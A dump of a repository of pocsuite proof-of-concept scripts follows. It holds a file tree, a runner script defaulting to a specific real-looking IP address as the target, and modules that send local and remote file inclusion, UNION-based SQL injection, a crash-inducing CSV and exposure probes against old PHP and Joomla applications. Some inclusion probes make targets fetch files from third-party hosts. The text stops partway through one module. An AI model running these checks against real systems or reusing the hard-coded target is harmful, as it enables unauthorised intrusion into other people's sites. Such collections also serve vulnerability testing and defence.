├── .DS_Store
├── README.md
├── tmp.py
├── Joomla Component com_pc LFI Vulnerability.py
├── Mafia Moblog 6 Big.PHP Remote File Include Vulnerability.py
├── Clicksor SQL Injecti0n Vulnerability.py
├── KeePass Password Safe Classic 1.29 - Crash.py
├── IDevSpot PHPLinkExchange 1.0 Index.PHP Remote File Include Vulnerability.py
├── DreamAccount _= 3.1 (auth.api.php) Remote File Include Exploit.py
├── dede_reinstall.py
├── GrayCMS 1.1 Error.PHP Remote File Include Vulnerability.py
├── McNews 1.x Install.PHP Arbitrary File Include Vulnerability.py
├── FlatNuke 2.5.7 Index.php Remote File Include Vulnerability.py
├── Gnat-TGP _= 1.2.20 Remote File Include Vulnerability.py
├── Modernbill _= 1.6 (config.php) Remote File Include Vulnerability.py
├── Cyberfolio _= 2.0 RC1 (av) Remote File Include Vulnerabilities.py
├── Azeno CMS SQL Injection Vulnerability.py
├── Insky CMS 006-0111 - Multiple Remote File Include Vulnerability.py
├── MyABraCaDaWeb _= 1.0.3 (base) Remote File Include Vulnerabilities.py
├── galleria Mambo Module _= 1.0b Remote File Include Vulnerability.py
├── AlstraSoft EPay Pro 2.0 - Remote File Include Vulnerability.py
├── Angelo-emlak 1.0 - Database Disclosure Vulnerability.py
├── KISGB _= (tmp_theme) 5.1.1 - Local File Inclusion Vulnerability.py
├── dotWidget CMS _= 1.0.6 (file_path) Remote File Include Vulnerabilities.py
├── Hitweb _= 4.2.1 (REP_INC) Remote File Include Vulnerability.py
├── Minerva _= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability.py
├── GeniXCMS 0.0.3 - XSS Vulnerabilities.py
├── Joomla Spider Form Maker _= 3.4 - SQLInjection.py
├── MunkyScripts Simple Gallery SQL Injection Vulnerability.py
├── interact _= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability.py
├── mambo com_babackup Component _= 1.1 File Include Vulnerability.py
├── ecoCMS 18.4.2010 'admin.php' Cross Site Scripting Vulnerability.py
├── dede_search.php_sqli.py
├── Limbo CMS Module event 1.0 - Remote File Include Vulnerability.py
├── 724CMS _= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability.py
├── Mambo cropimage Component _= 1.0 - Remote File Include Vulnerability.py
├── Joomla Kochsuite Component _= 0.9.4 - Remote File Include Vulnerability.py
├── DirPHP 1.0 - LFI Vulnerability.py
├── Huawei E5331 API验证绕过漏洞.py
├── JASmine _= 0.0.2 (index.php) Remote File Include Vulnerability.py
├── eWebEditor 弱密码漏洞.py
├── GlassFish 任意文件读取漏洞.py
├── _160615_GlassFish_410_file_read.py
├── Dream4 Koobi CMS 4.2.3 Index.PHP Cross-Site Scripting Vulnerability.py
├── _130423_eWebEditor_all_weak_password.py
├── CMS phpshop 2.0 - SQL Injection Vulnerability.py
├── _170826_Zabbix_303_SQL_Injection.py
├── FlexCMS 2.5 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting Vulnerability.py
├── FotoWeb 6.0 Login.fwx s Parameter XSS.py
├── Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp.py
├── _170826_Joomla_345_RCE.py
├── Discuz! Plugin JiangHu _= 1.1 (id) SQL Injection Vulnerability.py
├── MyBB 1.6.5 suffers from a cross site scripting vulnerability.py
├── Apple Macintosh OS X .DS_Store 信息泄露漏洞.py
├── Joomla Spider Calendar _= 3.2.6 - SQL Injection.py
├── _170815_Redis_all_unauthorized.py
├── dede_guestbook_sqli.py
├── _170812_Cacti_all_file_upload.py
├── _180323_180219_Tomcat_7_PUT_RCE.py
├── _160615_Struts2_037_rce.py
├── FlashChat _= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability.py
├── Max's Image Uploader Shell Upload Vulnerability.py
├── Gizzar _= 03162002 (index.php) Remote File Include Vulnerability.py
├── Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS.py
├── Joomla Component com_jequoteform - Local File Inclusion.py
├── IIS 系列 Http.sys 处理 Range 整数溢出漏洞.py
├── joomla! 组件GoogleSearch (CSE) V3.0.2 参数q XSS漏洞.py
├── dede_recommend.php_sqli.py
├── BookingeCMS HotelCMS酒店预订管理系统key和m=info.detail id存在注入.py
├── EMC Cloud Tiering Appliance v10.0 Unauthenticated XXE Arbitrary File Read.py
├── Joomla Component com_carman Cross Site Scripting Vulnerability.py
├── Joomla Component com_job (showMoreUse) SQL injection vulnerability.py
├── joomla component The Estate Agent (com_estateagent) SQL injection Vulnerability.py
├── _180323_170928_Struts2_045_rce.py
├── EZ-Oscommerce 3.1 - Remote File Upload.py
├── _141017_phpMyAdmin_all_weak_password.py
├── Joomla Component simpledownload 0.9.5 - LFI Vulnerability.py
├── Joomla Component (com_jimtawl) Local File Inclusion Vulnerability.py
├── Joomla Component (com_ezautos) SQL Injection Vulnerability.py
├── Joomla Component com_doqment (cid) SQL Injection Vulnerability.py
├── Joomla Component JE Event Calendar SQL Injection Vulnerability.py
├── _170605_SMB_ms17_010_RCE.py
├── Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection.py
├── Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability.py
├── Joomla RSfiles Component (cid param) - SQL Injection Vulnerability.py
├── HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability.py
├── Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln.py
├── Joomla Kunena Component (index.php, search parameter) SQL Injection.py
├── Joomla! and Mambo com_lexikon Component - 'id' Parameter SQL Injection Vulnerability.py
├── Joomla Component (com_idoblog) SQL Injection Vulnerability.py
├── Joomla! and Mambo gigCalendar Component 1.0 'banddetails.php' SQL Injection Vulnerability.py
├── Joomla Jobprofile Component (com_jobprofile) - SQL Injection.py
├── dede_download.php_sqli.php.py
├── ECShop支付宝插件SQL注入漏洞.py
└── _140408_OpenSSL_102_Heartbleed.py
/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/njcx/pocsuite_poc_collect/HEAD/.DS_Store
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # pocsuite_poc_collect
2 | A collection of PoCs written for the pocsuite framework. 收集一些 poc with pocsuite
3 |
--------------------------------------------------------------------------------
/tmp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding:utf-8
3 |
4 | from pocsuite.api.cannon import Cannon
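import sys

# Run-one-PoC harness: loads a single PoC module from the working directory
# and drives it in "verify" mode against one target through pocsuite's Cannon.
# The PoC source is read relative to the current working directory, so this
# script has to be started from the repository root or the open() fails.
with open("./_170826_Zabbix_303_SQL_Injection.py") as poc_file:
    poc_source = poc_file.read()

info = {"pocname": "_170826_Zabbix_303_SQL_Injection",
        "pocstring": poc_source,
        "mode": "verify"}

# The target is taken from the first command-line argument; the address that
# used to be hard-coded is kept only as the fallback so the old invocation
# (no arguments) still behaves the same.
target = sys.argv[1] if len(sys.argv) > 1 else "http://89.239.138.140"
invoker = Cannon(target, info)
result = invoker.run()
# A single parenthesised argument prints identically under Python 2 and 3.
print(result)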
13 |
--------------------------------------------------------------------------------
/Joomla Component com_pc LFI Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import Output, POCBase
6 | from pocsuite.utils import register
7 |
class TestPOC(POCBase):
    """Local-file-inclusion verification check for the Joomla com_pc component.

    The probe requests index.php with the ``controller`` parameter set to a
    directory-traversal path ending in /etc/passwd, with a %00 appended, and
    treats the string ``/bin/bash`` in the response body as confirmation.
    For defenders, that exact query string (traversal sequence plus trailing
    %00) is what this check leaves in web-server access logs.
    The attributes below are metadata, presumably read by the pocsuite
    framework; note ``author`` is a plain string here where sibling checks use
    a list.
    """
    vulID = '67513'
    version = '1'
    author = 'p9k4r'
    vulDate = '2010-1-17'
    createDate = '2015-9-28'
    updateDate = '2015-9-28'
    references = ['http://www.sebug.net/vuldb/ssvid-67513']
    name = 'Joomla Component com_pc LFI Vulnerability'
    appPowerLink = 'joomla.org'
    appName = 'Joomla Component com_pc'
    appVersion = '*'
    vulType = 'Local File Inclusion'
    desc = 'LFI'
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self, verify=True):
        """Send the traversal probe and report whether the passwd marker came back.

        ``verify`` is accepted for interface compatibility only; it is not read.
        The HTTP request is bounded by a 10 second timeout.
        """
        probe = '%s/index.php?option=com_pc&controller=../../../../../../../etc/passwd' % self.url
        body = req.get(probe + '%00', timeout=10).content
        hit = '/bin/bash' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if hit else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
47 |
48 |
49 | register(TestPOC)
50 |
--------------------------------------------------------------------------------
/Mafia Moblog 6 Big.PHP Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
class TestPOC(POCBase):
    """Remote-file-inclusion verification check for Mafia Moblog 6 (big.php).

    The probe points ``pathtotemplate`` at an external URL (baidu.com/robots.txt)
    and requires both ``Baiduspider`` and ``Googlebot`` in the response body
    before reporting success.  Two practical caveats: the target is made to
    fetch content from a third-party host, and the verdict depends on that host
    being reachable from the target (presumably a false negative otherwise).
    The attributes are metadata, presumably read by the pocsuite framework.
    """
    vulID = '81940'  # ssvid
    version = '1.0'
    author = ['皮皮']
    vulDate = '2006-08-16'
    createDate = '2015-12-24'
    updateDate = '2015-12-24'
    references = ['http://www.sebug.net/vuldb/ssvid-81940']
    name = 'Mafia Moblog 6 Big.PHP Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'Mafia Moblog'
    appVersion = '6'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/big.php?pathtotemplate=http://baidu.com/robots.txt?' % self.url
        body = req.get(probe).content
        both_markers = 'Baiduspider' in body and 'Googlebot' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if both_markers else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
50 |
51 | register(TestPOC)
52 |
--------------------------------------------------------------------------------
/Clicksor SQL Injecti0n Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 |
class TestPOC(POCBase):
    """SQL-injection verification check for Clicksor (index.php ``id`` parameter).

    The probe appends a UNION SELECT that evaluates md5(666) on the database
    side and looks for the known digest of 666 in the response body.  A hit is
    reported with the full probe URL; for defenders that query string (the
    ``UNION SELECT ... md5(666)`` fragment) is the log signature of this check.
    NOTE(review): ``vulID`` says SSV-68525 while ``references`` points at
    ssvid-19358 — confirm which identifier is intended.
    """
    vulID = 'SSV-68525'  # vul ID
    version = '1'
    author = 'fenghh'
    vulDate = '2010-05-04'
    createDate = '2015-10-15'
    updateDate = '2015-10-15'
    references = ['http://sebug.net/vuldb/ssvid-19358']
    name = 'Clicksor SQL Injection Vulnerability'
    appPowerLink = 'www.clicksor.com'
    appName = 'Clicksor'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
    google dock:" Powered by Clicksor.com Contextual Advertising".
    index.php?id参数导致过滤
    '''
    # the sample sites for examination
    samples = ['']

    def _verify(self):
        """Send the UNION probe; success carries the probe URL, failure a fixed message."""
        output = Output(self)
        payload = "/index.php?page=view&id=-511 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
        verify_url = self.url + payload
        body = req.get(verify_url).content
        if 'fae0b27c451c728867a567e8c1bb4e53' not in body:
            output.fail('SQL Injection Failed')
            return output
        output.success({'VerifyInfo': {'URL': verify_url}})
        return output

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()
41 |
42 | def _attack(self):
43 | return self._verify()
44 |
45 | register(TestPOC)
--------------------------------------------------------------------------------
/KeePass Password Safe Classic 1.29 - Crash.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
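class TestPOC(POCBase):
    """Writes a CSV file intended (per the file name) to crash KeePass Classic 1.29 on import.

    This check does no network I/O at all: ``_attack`` writes ``r3z4.csv`` into
    the current working directory, and ``_verify`` is an empty stub.  Because
    ``result`` is never populated, both paths always produce a failure Output
    (the file is still written).  Nearly all metadata attributes are empty —
    ``references`` even ends in a dangling ``ssvid-`` — so the framework has
    nothing meaningful to display for this check.
    """
    vulID = ''  # ssvid — not filled in
    version = '1.0'
    author = ['抽烟的2b青年']
    vulDate = ''
    createDate = '2016-01-12'
    updateDate = '2016-01-12'
    references = ['http://www.sebug.net/vuldb/ssvid-']
    name = ''
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = ''
    desc = '''
    '''
    samples = ['']

    def _attack(self):
        """Write the oversized CSV record to r3z4.csv in the current directory.

        Returns the Output from parse_output; ``result`` stays empty, so this
        is always the failure Output, as in the original.
        """
        result = {}
        hdr = '"'  # start syntax
        hcr = "R3Z4"  # user
        oth = ',"'  # user
        oth2 = '","",""'  # user
        val = ','
        crash = "\x41" * 199289  # B0F
        exp = hdr + hcr + hdr + val + hdr + hcr + hdr + oth + crash + oth2
        # Context manager so the handle is closed even if write() raises;
        # the original left the file open on that path.
        with open("r3z4.csv", "w") as csv_file:
            csv_file.write(exp)
        return self.parse_output(result)

    def _verify(self):
        """Stub: nothing is checked, so this always yields the failure Output."""
        result = {}
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise a fixed failure message."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output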
54 |
55 |
56 | register(TestPOC)
--------------------------------------------------------------------------------
/IDevSpot PHPLinkExchange 1.0 Index.PHP Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
class TestPOC(POCBase):
    """Remote-file-inclusion verification check for IDevSpot PHPLinkExchange 1.0.

    The probe points index.php's ``page`` parameter at baidu.com/robots.txt and
    requires both ``Googlebot`` and ``Baiduspider`` in the response body.
    The target is made to fetch content from a third-party host, and the
    verdict depends on that host being reachable from the target (presumably a
    false negative otherwise).  Attributes are pocsuite metadata.
    """
    vulID = '81821'  # ssvid
    version = '1.0'
    author = ['皮皮']
    vulDate = '2006-07-24'
    createDate = '2015-12-24'
    updateDate = '2015-12-24'
    references = ['http://www.sebug.net/vuldb/ssvid-81821']
    name = 'IDevSpot PHPLinkExchange 1.0 Index.PHP Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'IDevSpot PHPLinkExchange'
    appVersion = '1.0'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/index.php?page=http://baidu.com/robots.txt' % self.url
        body = req.get(probe).content
        both_markers = 'Googlebot' in body and 'Baiduspider' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if both_markers else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
50 |
51 | register(TestPOC)
--------------------------------------------------------------------------------
/DreamAccount _= 3.1 (auth.api.php) Remote File Include Exploit.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import Output, POCBase
6 | from pocsuite.utils import register
7 |
class TestPOC(POCBase):
    """Remote-file-inclusion verification check for DreamAccount <= 3.1.

    The probe points Authentication.api.php's ``path`` parameter at
    baidu.com/robots.txt.  Unlike the sibling checks in this collection, a
    single marker (``Baiduspider`` *or* ``Googlebot``) is enough for success,
    which makes it somewhat more prone to false positives on pages that happen
    to mention either crawler.  The target is made to fetch content from a
    third-party host.  Attributes are pocsuite metadata.
    """
    vulID = '63672'  # ssvid
    version = '1.0'
    author = ['皮皮']
    vulDate = '2006-12-01'
    createDate = '2015-12-24'
    updateDate = '2015-12-24'
    references = ['http://www.sebug.net/vuldb/ssvid-63672']
    name = 'DreamAccount <= 3.1 (Authentication.api.php) Remote File Include Exploit'
    appPowerLink = ''
    appName = 'DreamAccount'
    appVersion = '<= 3.1'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/Authentication.api.php?path=http://baidu.com/robots.txt?' % self.url
        body = req.get(probe).content
        any_marker = 'Baiduspider' in body or 'Googlebot' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if any_marker else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
50 |
51 | register(TestPOC)
52 |
--------------------------------------------------------------------------------
/dede_reinstall.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 |
8 |
class TestPOC(POCBase):
    """Exposure check for a leftover dedecms install/index.php.bak.

    The probe only tests whether ``/install/index.php.bak`` answers with HTTP
    200; the body is not inspected.  That is a weak indicator — any site that
    serves a catch-all 200 page for unknown paths will be reported as
    vulnerable — so treat a hit as a candidate to confirm manually.
    NOTE(review): ``vulDate`` (2016-5-27) is later than ``createDate``
    (2016-2-20); confirm which is intended.
    """
    vulID = '5'
    version = '1'
    author = ['fengxuan']
    vulDate = '2016-5-27'
    createDate = '2016-2-20'
    updateDate = '2016-2-20'
    references = ['http://www.evalshell.com', 'http://www.cnseay.com/3714/']
    name = 'dedecms install/index.php.bak重装漏洞'
    appPowerLink = 'http://www.dedecms.cn/'
    appName = 'dedecms'
    appVersion = '5.7'
    vulType = 'Code Execution'
    desc = '''
    dedecms
    在默认安装后回生成install/index.php.bak。来判断网站是否安装。
    但是在web容器为apache的情况下,对index.php.bak会解析为php文件
    详情请搜索apache解析漏洞
    '''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self, verify=True):
        """GET the .bak path and report success on a 200 status.

        ``verify`` is accepted for interface compatibility only; it is not read.
        """
        probe = '%s/install/index.php.bak' % self.url
        reachable = req.get(probe).status_code == 200
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if reachable else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise a fixed failure message."""
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
        else:
            output.success(result)
        return output
51 |
52 | register(TestPOC)
53 |
--------------------------------------------------------------------------------
/GrayCMS 1.1 Error.PHP Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
class GrayCMS_Remote_File_Include(POCBase):
    """Remote-file-inclusion verification check for GrayCMS 1.1 (code/error.php).

    The probe points ``path_prefix`` at a file on tool.scanv.com and searches
    the response for a fixed hex marker.  What that remote file does when the
    target includes it is not visible here — presumably it only echoes the
    marker, but confirm before use, because the target executes whatever that
    third-party host serves.  The verdict also depends on that host being
    reachable from the target.  ``author`` and ``updateDate`` are blank.
    """
    vulID = '79199'
    version = '1'
    vulDate = '2005-04-26'
    author = ' '
    createDate = '2015-12-19'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-79199']
    name = 'GrayCMS 1.1 Error.PHP Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'GrayCMS'
    appVersion = '1.1'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/code/error.php?path_prefix=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        body = req.get(probe).content
        # Plain substring test: the marker has no regex metacharacters.
        hit = 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if hit else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
52 |
53 | register(GrayCMS_Remote_File_Include)
--------------------------------------------------------------------------------
/McNews 1.x Install.PHP Arbitrary File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
class McNews_Remote_File_Include(POCBase):
    """File-inclusion verification check for McNews 1.x (admin/install.php).

    The probe points the ``l`` parameter at a file on tool.scanv.com and
    searches the response for a fixed hex marker.  What that remote file does
    when the target includes it is not visible here — presumably it only echoes
    the marker, but confirm before use, because the target executes whatever
    that third-party host serves.  ``author`` and ``updateDate`` are blank.
    """
    vulID = '78899'
    version = '1'
    vulDate = '2005-03-17'
    author = ' '
    createDate = '2015-12-17'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-78899']
    name = 'McNews 1.x Install.PHP Arbitrary File Include Vulnerability'
    appPowerLink = ''
    appName = 'McNews'
    appVersion = '1.x'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/admin/install.php?l=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        body = req.get(probe).content
        # Plain substring test: the marker has no regex metacharacters.
        hit = 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if hit else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
52 |
53 | register(McNews_Remote_File_Include)
--------------------------------------------------------------------------------
/FlatNuke 2.5.7 Index.php Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
class FlatNuke_Remote_File_Include(POCBase):
    """Remote-file-inclusion verification check for FlatNuke 2.5.7 (index.php).

    The probe points ``file_path`` at a file on tool.scanv.com and searches the
    response for a fixed hex marker.  What that remote file does when the
    target includes it is not visible here — presumably it only echoes the
    marker, but confirm before use, because the target executes whatever that
    third-party host serves.  ``author`` and ``updateDate`` are blank.
    """
    vulID = '63616'
    version = '1'
    vulDate = '2006-07-13'
    author = ' '
    createDate = '2015-12-16'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-63616']
    name = 'FlatNuke 2.5.7 Index.php Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'FlatNuke'
    appVersion = '2.5.7'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        body = req.get(probe).content
        # Plain substring test: the marker has no regex metacharacters.
        hit = 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if hit else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
52 |
53 | register(FlatNuke_Remote_File_Include)
--------------------------------------------------------------------------------
/Gnat-TGP _= 1.2.20 Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
class GnatTGP_Remote_File_Include(POCBase):
    """Remote-file-inclusion verification check for Gnat-TGP <= 1.2.20 (includes/tgpinc.php).

    The probe points ``DOCUMENT_ROOT`` at a file on tool.scanv.com and searches
    the response for a fixed hex marker.  What that remote file does when the
    target includes it is not visible here — presumably it only echoes the
    marker, but confirm before use, because the target executes whatever that
    third-party host serves.  ``author`` and ``updateDate`` are blank.
    """
    vulID = '67834'
    version = '1'
    vulDate = '2010-03-03'
    author = ' '
    createDate = '2015-12-17'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-67834']
    name = 'Gnat-TGP <= 1.2.20 Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'Gnat-TGP'
    appVersion = '<= 1.2.20'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/includes/tgpinc.php?DOCUMENT_ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        body = req.get(probe).content
        # Plain substring test: the marker has no regex metacharacters.
        hit = 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if hit else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
52 |
53 | register(GnatTGP_Remote_File_Include)
--------------------------------------------------------------------------------
/Modernbill _= 1.6 (config.php) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
class TestPOC(POCBase):
    """Remote-file-inclusion verification check for Modernbill <= 1.6 (include/html/config.php).

    The probe points the ``DIR`` parameter at baidu.com/robots.txt and requires
    both ``Baiduspider`` and ``Googlebot`` in the response body.  The target is
    made to fetch content from a third-party host, and the verdict depends on
    that host being reachable from the target (presumably a false negative
    otherwise).  Attributes are pocsuite metadata.
    """
    vulID = '63791'  # ssvid
    version = '1.0'
    author = ['皮皮']
    vulDate = '2006-08-09'
    createDate = '2015-12-24'
    updateDate = '2015-12-24'
    references = ['http://www.sebug.net/vuldb/ssvid-63791']
    name = 'Modernbill <= 1.6 (config.php) Remote File Include Vulnerability'
    appPowerLink = 'http://freshmeat.net/projects/modernbill/'
    appName = 'Modernbill'
    appVersion = '<= 1.6'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/include/html/config.php?DIR=http://baidu.com/robots.txt?' % self.url
        body = req.get(probe).content
        both_markers = 'Baiduspider' in body and 'Googlebot' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if both_markers else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
50 |
51 | register(TestPOC)
--------------------------------------------------------------------------------
/Cyberfolio _= 2.0 RC1 (av) Remote File Include Vulnerabilities.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
class Cyberfolio_Remote_File_Include(POCBase):
    """Remote-file-inclusion verification check for Cyberfolio <= 2.0 RC1 (portfolio/msg/view.php).

    The probe points the ``av`` parameter at a file on tool.scanv.com and
    searches the response for a fixed hex marker.  What that remote file does
    when the target includes it is not visible here — presumably it only echoes
    the marker, but confirm before use, because the target executes whatever
    that third-party host serves.  ``author`` and ``updateDate`` are blank.
    """
    vulID = '64221'
    version = '1'
    vulDate = '2006-11-06'
    author = ' '
    createDate = '2015-12-20'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-64221']
    name = 'Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities'
    appPowerLink = ''
    appName = 'Cyberfolio'
    appVersion = '<= 2.0'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/portfolio/msg/view.php?av=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        body = req.get(probe).content
        # Plain substring test: the marker has no regex metacharacters.
        hit = 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in body
